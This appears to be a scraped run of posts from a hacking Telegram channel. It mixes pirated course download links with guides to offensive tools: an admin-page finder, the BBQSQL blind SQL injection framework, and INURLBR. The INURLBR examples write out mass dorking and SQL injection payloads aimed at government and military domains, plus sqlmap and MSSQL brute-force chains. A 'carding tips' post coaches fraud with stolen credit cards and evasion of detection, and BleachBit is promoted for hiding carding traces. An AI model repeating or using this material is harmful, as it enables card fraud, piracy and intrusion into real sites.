🦑500GB PROGRAMMING TUTORIALS (VIDEOS)

ONLY USEFULL THINGS

> Link : https://drive.google.com/drive/u/0/mobile/folders/0ByWO0aO1eI_MN1BEd3VNRUZENkU

🦑JAVA CLASSES & OBJECTS 4K DETAILED BY youtube.com/undercode :

https://www.youtube.com/watch?v=84hGoR9HjAY

ENJOY ❤️👍🏻

🦑BEST HACKING PYTHON LIBS :

Python: https://www.python.org/downloads/

PyCurl: http://pycurl.sourceforge.net/

PyBeautifulSoup4: https://pypi.org/project/beautifulsoup4/

PyGeoIP: https://pypi.org/project/pygeoip/

PyGObject: https://pypi.org/project/gobject/

PyCairocffi: https://pypi.org/project/cairocffi/

PySelenium: https://pypi.org/project/selenium/

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Building Web Servers in Java —632 MB—-

https://www.packtpub.com/application-development/building-web-servers-java-video

https://mega.nz/folder/d3ZmgQbC#7jWhIWPp9Fr7kC4IN30AJA

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑#FastTips :Much Required Advice for Beginners :
(#carding tips)

1️⃣ Using socks5 that fit the billing address of the cardholder (dont using socks4 or http proxies because they can leak DNS info).

2️⃣If your CC comes from UK, try using a drop in UK and so on for other countries

3️⃣If there is a gift choice, place it so it looks like you're sending a present to some buddy, girlfriend and so on.

4️⃣ Seek to render requests such as valentines before holidays etc. That's an ancient strategy now but it works for 2 purposes. These days the shops are having a ton of requests, and they can transfer one of the scams as genuine as well. So it seems as though you are giving a legit gift

5️⃣ Using cracked / open wifi + modified MAC, VPN in some offshore country + 2-3 sockets in a virtual machine for your protection. I recommend you import VMWare and a ready-made file to launch it. Attempt to build your own encryption proxy chain, with the last external IP that fits the address of the cardholders.

6️⃣Using Firefox with Plugins in private mode. Found several extensions relevant to protection that do not control connections, transparent cookies, LSO & flash cookies, etc. Be imaginative, and learn.

7️⃣Use gmail / hotmail / yahoo when ordering or Use @some hipster email provider, one that many people don't really use. It does make things seem legal.

8️⃣Attempt also to card on Weekends as shops unable to touch and search Extra bank info, by calling them. You may even test the time the closes Bank

9️⃣Please send an email to the vendor shortly after finishing the order to ship.

🔟Fast as you desperately need it, as there is some purpose in your building.

1️⃣1️⃣Do not use a cc on the same site with separate Accounts.
Full record: 3-4 Years max.

1️⃣2️⃣ When you use the pp in carding instead purchase pp with email
access and remove the order linked emails from the email inbox and trash box

CARDING IS FOR LEARN, NOT FOR STEAL !!!

Share us❤️👍🏻
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 webhacking-
- find admin login pages and EAR vulnerabilites.
-Termux/Linux

🦑Features :

> Multi-threading on demand

> Big path list (482 paths)

> Supports php, asp and html extensions

> Checks for potential EAR vulnerabilites

> Checks for robots.txt

> Support for custom patns

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/s0md3v/Breacher.git

2️⃣cd Breacher

3️⃣EXAMPLES :

> Check all paths with php extension
python breacher -u example.com --type php

> Check all paths with php extension with threads
python breacher -u example.com --type php --fast

> Check all paths without threads
python breacher -u example.com

> Adding a custom path. For example if you want all paths to start with /data (example.com/data/...) you can do this:

python breacher -u example.com --path /data

🦑STILL TROUBLE ?
> https://youtu.be/BEpt5JmcWPk

enjoy ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST 2020 BROWSER LOG CLEANER(Carding) & System logs REMOVER :
BleachBit cleans files to free disk space and to maintain privacy.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/bleachbit/bleachbit.git

2️⃣cd bleachbit

3️⃣Then install via make command 
> make -C po local # build translations

4️⃣python3 bleachbit.py

5️⃣For information regarding the command line interface, run:

>  python3 bleachbit.py --help

🦑TESTED ON':

-PARROT

-KALI

-UBUNTU

ENJOY ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Learn about Python and Blockchain: The Complete Guide —5.79 GB—

https://www.udemy.com/course/learn-about-python-and-blockchain-the-complete-guide/

https://mega.nz/folder/1q4nXaSD#a3OuvWFPQxOhcm5IHdq2bw

🆂🆄🅿️🅿️🅾️🆁🆃 & 🆂🅷🅰️🆁🅴 :

T.me/UndercodeSecurity

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑How Run Python Hacking Scripts Via windows :
#FastTips

1️⃣Download
> https://www.python.org/downloads/windows/

2️⃣Run setup file

3️⃣Download :
https://visualstudio.microsoft.com/thank-you-downloading-visual-studio/?sku=BuildTools&rel=16

4️⃣run setup
video tutorial :
> https://www.youtube.com/watch?v=n5sJ4EewKGk&autoplay=1

5️⃣Go powerShell and type :

> pip install --upgrade setuptools

6️⃣Now you can install git:

https://git-scm.com/download/win
(Download & run)
& more libs from powershell
& load and Python Script

ENJOY ❤️👍🏻
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Linux-Termux tip :
What is BBQSQL?

> Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.

> BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/Neohapsis/bbqsql.git

2️⃣cd bbqsql

3️⃣install in one command :
sudo pip install bbqsql (kali-parrot repo)

4️⃣for termux
>  python setup.py install

5️⃣The query syntax is based around placeholders which tell BBQSQL how to execute the attack ?
➕Example :

You need to provide the following placeholders of information in order for the attack to work. Once you put these in your query, bbqSQL will do the rest:

${row_index}: This tells bbqSQL to iterate rows here. Since we are using LIMIT we can view n number of row depending on ${row_index} value.

${char_index}: This tells bbqSQL which character from the subselect to query.

${char_val}: This tells bbqSQL where to compare the results from the subselect to validate the result.

${comparator}: This is how you tell BBQSQL to compare the responses to determine if the result is true or not. By default, the > symbol is used.

${sleep}: This is optional but tells bbqSQL where to insert the number of seconds to sleep when performing time based SQL injection.

Not all of these place holders are required. For example, if you have discovered semi-blind boolean based SQL injection you can omit the ${sleep} parameter.

6️⃣FOR MORE EXAMPLES :
https://github.com/Neohapsis/bbqsql#install

🦑Features :

URL
HTTP Method
Headers
Cookies
Encoding methods
Redirect behavior
Files
HTTP Auth
Proxies

ENJOY ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Privilege Escalation☠️Methodes & Tools :


> [4 Ways get linux privilege escalation](http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation/) | shows different examples of PE

> [A GUIDE TO LINUX PRIVILEGE ESCALATION](https://payatu.com/guide-linux-privilege-escalation/) | Basics of Linux privilege escalation

> [Abusing SUDO (Linux Privilege Escalation)](http://touhidshaikh.com/blog/?p=790) | Abusing SUDO (Linux Privilege Escalation)

> [AutoLocalPrivilegeEscalation](https://github.com/ngalongc/AutoLocalPrivilegeEscalation) | automated scripts that downloads and compiles from exploitdb

> [Basic linux privilege escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) | basic linux exploitation, also covers Windows

> [Common Windows Privilege Escalation Vectors](https://www.toshellandback.com/2015/11/24/ms-priv-esc/) | Common Windows Privilege Escalation Vectors

> [Editing /etc/passwd File for Privilege Escalation](http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) | Editing /etc/passwd File for Privilege Escalation

> [Linux Privilege Escalation ](https://securityweekly.com/2017/12/17/linux-privilege-escalation-tradecraft-security-weekly-22/) | Linux Privilege Escalation – Tradecraft Security Weekly (Video)

> [Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) | a simple linux PE check script

> [Linux Privilege Escalation Scripts](http://netsec.ws/?p=309#more-309) | a list of PE checking scripts, some may have already been covered

> [Linux Privilege Escalation Using PATH Variable](http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/) | Linux Privilege Escalation Using PATH Variable

> [Linux Privilege Escalation using Misconfigured NFS](http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/) | Linux Privilege Escalation using Misconfigured NFS

> [Linux Privilege Escalation via Dynamically Linked Shared Object Library](https://www.contextis.com/blog/linux-privilege-escalation-via-dynamically-linked-shared-object-library) | How RPATH and Weak File Permissions can lead to a system compromise.

> [Local Linux Enumeration & Privilege Escalation Cheatsheet](https://www.rebootuser.com/?p=1623) | good resources that could be compiled into a script

> [OSCP - Windows Priviledge Escalation](http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html) | Common Windows Priviledge Escalation

> [Privilege escalation for Windows and Linux](https://github.com/AusJock/Privilege-Escalation) | covers a couple different exploits for Windows and Linux

> [Privilege escalation linux with live example](http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/) | covers a couple common PE methods in linux


ENJOY ❤️👍🏻
✅Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Animation #Tips NativeScript —502 MB—-


https://www.pluralsight.com/courses/nativescript-animation-techniques

https://mega.nz/folder/57AwXIjY#yRK4ONTav6V32DaYnfxwMg

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Online News Sources :

> InfoSec | covers all the latest infosec topics

> Recent Hash Leaks | great place to lookup hashes

> Security Intell | covers all kinds of news, great intelligence resources

> Threatpost | covers all the latest threats and breaches

> Secjuice

> The Hacker News | features a daily stream of hack news, also has an app

ENJOY ❤️👍🏻
✅Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Some resources for Beginers :


- How to Become a Successful Bug Bounty Hunter

- Researcher Resources - How to become a Bug Bounty Hunter

- Bug Bounties 101

- The life of a bug bounty hunter

- Awsome list of bugbounty cheatsheets

- Getting Started - Bug Bounty Hunter Methodology

:)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑SCANNER-INURLBR -Termux-Linux :
> Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found..->

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣ git clone https://github.com/googleinurl/SCANNER-INURLBR.git

2️⃣cd SCANNER-INURLBR

3️⃣$chmod +x inurlbr.php

4️⃣ ./inurlbr.php

5️⃣To get a list of basic options and switches use:

php inurlbr.php -h

6️⃣SOME EXAMPLES :

./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'

./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'

./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'

./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'

./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?´0x27 --command-vul 'nmap sV -p 22,80,21 TARGET'

./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssqllogin RHOST=TARGETIP MSSQLUSER=inurlbr MSSQLPASSFILE=/home/pedr0/Documentos/passwords E'

./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "TARGETFULL" --dbs'

./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open TARGET'

./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '(\w\d\.\-\_+)@(\w\d\.\_\-+)'

./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m

./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u

./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6

./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)'

./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6

./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil'



Share us❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁